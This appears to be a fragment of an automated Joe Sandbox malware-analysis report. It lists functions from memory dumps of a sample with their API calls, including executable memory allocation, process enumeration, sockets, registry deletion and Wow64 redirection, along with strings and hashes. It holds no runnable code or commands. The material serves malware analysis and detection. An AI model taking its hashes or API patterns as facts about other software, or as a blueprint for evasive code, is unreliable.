Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=*
API String ID: 3158253471-789142211
Opcode ID: bb2dea6afa731fac4e5a0c001e824ba135a7bea80519e440eb42f4185088c215
Instruction ID: d0b11c0a75f5779d9f8caa67fe970963b0cd6e1a7d1723bb6ca49cccfda3790b
Opcode Fuzzy Hash: bb2dea6afa731fac4e5a0c001e824ba135a7bea80519e440eb42f4185088c215
Instruction Fuzzy Hash: 4FE06DB02207118FD3219F39E449B42BAE0AF04304F10895EE846C2341DBB4E514CF91

Function 0027C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0024027A,?), ref: 0027C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0027C6F9

Strings

GetSystemWow64DirectoryW, xrefs: 0027C6F3
kernel32.dll, xrefs: 0027C6E2

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 3cdf93c896de04d4373e7657d37edde019e9f64bbf00eb5f5c7d14b775c9475a
Instruction ID: 571c31ccd2c5cd56454afbe8e9bc66c7f514698e98f532f850464c07bd90a28b
Opcode Fuzzy Hash: 3cdf93c896de04d4373e7657d37edde019e9f64bbf00eb5f5c7d14b775c9475a
Instruction Fuzzy Hash: 89E08C789203038FD7204F3ADC89A52B6D8AB04764B60C42EE89DC2210DB70C8908F10

Function 00214B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00214B44,?,002149D4,?,?,002127AF,?,00000001), ref: 00214B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00214B97

Strings

Wow64DisableWow64FsRedirection, xrefs: 00214B91
kernel32.dll, xrefs: 00214B80

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 788110ce8d5c2cd23eb641ea8d8a065d2eee0fbf28ed76aa6ef6aa63a2c1364d
Instruction ID: 28511e2fda45bb67f5de287db48838fad906b006ddf506247f221465c929de1a
Opcode Fuzzy Hash: 788110ce8d5c2cd23eb641ea8d8a065d2eee0fbf28ed76aa6ef6aa63a2c1364d
Instruction Fuzzy Hash: 62D017B09247178FE720AF31EC98B8676E4AF15795F21882BD49AE2560E670E8D0CA14

Function 00214BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00214AF7,?), ref: 00214BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00214BCA

Strings

Wow64RevertWow64FsRedirection, xrefs: 00214BC4
kernel32.dll, xrefs: 00214BB3

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: ea52e80393cad1f0f694349961912a35c699202f518b88d52baf9962317ab713
Instruction ID: 12f6a60664387e721e5e1ec465143a2115bc0ade9affdb365b7d1ab5b2e6ee17
Opcode Fuzzy Hash: ea52e80393cad1f0f694349961912a35c699202f518b88d52baf9962317ab713
Instruction Fuzzy Hash: 9DD0C7308243138FE720AF31EC88B8672E4AF01388B008C2AD49AC2960EA70C8E0CA10

Function 00281447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00281696), ref: 00281455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00281467

Strings

advapi32.dll, xrefs: 00281450
RegDeleteKeyExW, xrefs: 00281461

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 277281fc7705395b95d0f9e0831175f83e8f262dc1f4ae8a66d59c7e85b74f8a
Instruction ID: 1cfee3cce6d63631ff1720b8aba29d2434741962098d0f4297b7c2e0afe973f3
Opcode Fuzzy Hash: 277281fc7705395b95d0f9e0831175f83e8f262dc1f4ae8a66d59c7e85b74f8a
Instruction Fuzzy Hash: 85D012345217178FD7205F75D84864676E8AF06395B11CC2A94D9D21A0D670D4E0C720

Function 002155F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00215E3D), ref: 002155FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00215610

Strings

kernel32.dll, xrefs: 002155F9
GetNativeSystemInfo, xrefs: 0021560A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: c5f54d93e80ba36feb3c97939b3e2a816f006b0696f36722ac44e7b1426ee223
Instruction ID: eff1d17af7118c9822f3b8364ed849d409cd723301e359deb8dda1e6d4f7bcbd
Opcode Fuzzy Hash: c5f54d93e80ba36feb3c97939b3e2a816f006b0696f36722ac44e7b1426ee223
Instruction Fuzzy Hash: 92D0C734C30B27CFEB208F31E88824676E8AF51741B00882AD49AC21A0E770C8D0CA90

Function 002797CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,002793DE,?,00290980), ref: 002797D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002797EA

Strings

GetModuleHandleExW, xrefs: 002797E4
kernel32.dll, xrefs: 002797D3

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: e40c4baa4c60911fccbbd78b9aaba02e41961de413f84b4e4253169ec5dbb715
Instruction ID: b34ffcbe0d1b1bceebd6382ea7aec40d1c072e1226e8b1e43fe2f4294803c883
Opcode Fuzzy Hash: e40c4baa4c60911fccbbd78b9aaba02e41961de413f84b4e4253169ec5dbb715
Instruction Fuzzy Hash: 4ED017B09307178FE7209F31E8C8646B6E5AF06791B11C82AD4DAE2160EBB0C8D0CA11

Function 00257D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1314a3103495600ff709a07baf73b432ecd6e7a30f361ddc1d3b4e502c37a663
Instruction ID: 7a05a541c71a427c5c810127f30fe252ff8adb503c5d2dc027a6f20672219396
Opcode Fuzzy Hash: 1314a3103495600ff709a07baf73b432ecd6e7a30f361ddc1d3b4e502c37a663
Instruction Fuzzy Hash: 2DC18E75A20216EFCB14CF94C884EAEB7B5FF48311B108598EC05EB251DB71ED95CB94

Function 0027E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0027E7A7
CharLowerBuffW.USER32(?,?), ref: 0027E7EA

Part of subcall function 0027DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0027DEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0027E9EA
_memmove.LIBCMT ref: 0027E9FD

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 5833f6609a293a29eb5e883ff848d9b64078f5a69054a4c7ed55ed8ecb786ffd
Instruction ID: 598cabd47c1af62524a223fc1d4a978b5b7fd025345f08125c687275ec5ef7f5
Opcode Fuzzy Hash: 5833f6609a293a29eb5e883ff848d9b64078f5a69054a4c7ed55ed8ecb786ffd
Instruction Fuzzy Hash: 01C18A71A243019FCB14DF28C48096ABBE4FF88314F05896EF9999B352D731E955CF92

Function 0027877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 002787AD
CoUninitialize.OLE32 ref: 002787B8

Part of subcall function 0028DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00278A0E,?,00000000), ref: 0028DF71

VariantInit.OLEAUT32(?), ref: 002787C3
VariantClear.OLEAUT32(?), ref: 00278A94

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: bc1ec1e17ef79b8cac32fe94f838da9bcf6f45b54852d521a7c9a5f224a48898
Instruction ID: 5d7d7bd07a1f63cf738798114d4f74fd6ad506704d2bf155f5d209fd4a3839c4
Opcode Fuzzy Hash: bc1ec1e17ef79b8cac32fe94f838da9bcf6f45b54852d521a7c9a5f224a48898
Instruction Fuzzy Hash: 4DA16A752647029FD700EF54C485B2AB7E5BF88314F148849FA999B3A2CB30ED50CF92

Function 0025814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00293C4C,?), ref: 00258308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00293C4C,?), ref: 00258320
CLSIDFromProgID.OLE32(?,?,00000000,00290988,000000FF,?,00000000,00000800,00000000,?,00293C4C,?), ref: 00258345
_memcmp.LIBCMT ref: 00258366

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 45d68225a3a179f2ebf6b2e9af6fd0f5e0397416eb185856b0b12b4ab2e4a72c
Instruction ID: a98a07f457c9ed08e086db8670f21939f3a1134afc9bc4a2d1812f483eefe5cf
Opcode Fuzzy Hash: 45d68225a3a179f2ebf6b2e9af6fd0f5e0397416eb185856b0b12b4ab2e4a72c
Instruction Fuzzy Hash: C0811A71A10109EFCB04DF94C884EEEB7B9FF89315F104598E905BB250DB71AE1ACB60

Function 0025749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002574AC
SysAllocString.OLEAUT32(00000000), ref: 00257555
VariantCopy.OLEAUT32 ref: 00257584
VariantClear.OLEAUT32(?), ref: 002575AB

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: ea8947344e9ede3d27cd9522485e3f5bd3f7252c1c97d439a43eeee01e1aeb7c
Instruction ID: 9234a9180547dc703d1e98ec052f06ca20739d84d9231112b7446dcee9956953
Opcode Fuzzy Hash: ea8947344e9ede3d27cd9522485e3f5bd3f7252c1c97d439a43eeee01e1aeb7c
Instruction Fuzzy Hash: 8B51CD306B87029BC7209F79B895A2DB3ED9F44311B20981FED45C76D2EB7098648F19

Function 0027F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0027F526
Process32FirstW.KERNEL32(00000000,?), ref: 0027F534

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Process32NextW.KERNEL32(00000000,?), ref: 0027F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0027F603

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 86accc8fc0a1fcda8e26f9e67932c87b3f8821e31420afc7b3821679828b798b
Instruction ID: 27f7f80862e9a7edeb487175c488129585d9135b131e6ef208de030116697f7e
Opcode Fuzzy Hash: 86accc8fc0a1fcda8e26f9e67932c87b3f8821e31420afc7b3821679828b798b
Instruction Fuzzy Hash: DF5191B1118311AFD310EF20DC85EABB7E8EF94740F40892DF595972A2EB709924CF92

Function 00289E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0152E750,?), ref: 00289E88
ScreenToClient.USER32(00000002,00000002), ref: 00289EBB
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00289F28

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 2305a6eb34d46a6b65a16f579a584a1c754b0fd96a9a3ec098bf33175b22e232
Instruction ID: 3513db24851a491387c2cff6731785b04bacc9abbfe639d3da28089d19e18199
Opcode Fuzzy Hash: 2305a6eb34d46a6b65a16f579a584a1c754b0fd96a9a3ec098bf33175b22e232
Instruction Fuzzy Hash: A9513D34A11209AFCB14EF54D8849BE7BB6FB54320F14825AF925D76A0D731ADA1CF90

Function 0022492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002249C0
__flush.LIBCMT ref: 002249E0
__write.LIBCMT ref: 00224A13
__flsbuf.LIBCMT ref: 00224A41

Part of subcall function 00228D58: __getptd_noexit.LIBCMT ref: 00228D58

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 4b2b86791d0e19b7ecc571e653d93af26e106bfa4dced4c2724ca7f017fd55af
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: C341C631620727BBDF28EFE9E8A09AF77A5AF44360B24813DE855C7640D771DDA08B44

Function 0025A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0025A68A
__itow.LIBCMT ref: 0025A6BB

Part of subcall function 0025A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0025A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0025A724
__itow.LIBCMT ref: 0025A77B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 38684dfd7d65fc505b57bae055a3c3b5d762065ae62a1052b9924e75edad5573
Instruction ID: 9688c7ac2089ad0977663c7688e77938c11b5fa75fd748a87b24f873f5c85e4c
Opcode Fuzzy Hash: 38684dfd7d65fc505b57bae055a3c3b5d762065ae62a1052b9924e75edad5573
Instruction Fuzzy Hash: 7D418574A20219AFDF11DF54C846BEE7BB9EF58751F040019FD0593281DB7099A8CFA6

Function 00277095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 002770BC
WSAGetLastError.WSOCK32(00000000), ref: 002770CC

Part of subcall function 00204D37: __itow.LIBCMT ref: 00204D62
Part of subcall function 00204D37: __swprintf.LIBCMT ref: 00204DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00277130
WSAGetLastError.WSOCK32(00000000), ref: 0027713C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 87e97995f6a82f955f72907ca3613a6b097e32895f176da491ee1570a6c4b9f5
Instruction ID: 5386d925eb67a0fa45d286f9dba7e8a1389fbd2e18ff2996deea098a64cb92c6
Opcode Fuzzy Hash: 87e97995f6a82f955f72907ca3613a6b097e32895f176da491ee1570a6c4b9f5
Instruction Fuzzy Hash: 07418FB1760300AFEB20BF249C86F6A77A49B04B14F54C458FA199B3D3DA709D108F91

Function 00276B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00290980), ref: 00276B92
_strlen.LIBCMT ref: 00276BC4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 0c1cc59e68627a6aba8fb1c5a701b3005dfce1a07ca6a5205b5e2b870491c51d
Instruction ID: 99421269128b2b061164f219bf8dadf5aa3c567eb0c8c4870d1b594e15e3ab2a
Opcode Fuzzy Hash: 0c1cc59e68627a6aba8fb1c5a701b3005dfce1a07ca6a5205b5e2b870491c51d
Instruction Fuzzy Hash: F841F471620509AFCB14FBA4D8C9EEEB3A9EF14310F148155F81A97292DB30AD61CF50

Function 0026BE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0026BEE1
GetLastError.KERNEL32(?,00000000), ref: 0026BF07
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0026BF2C
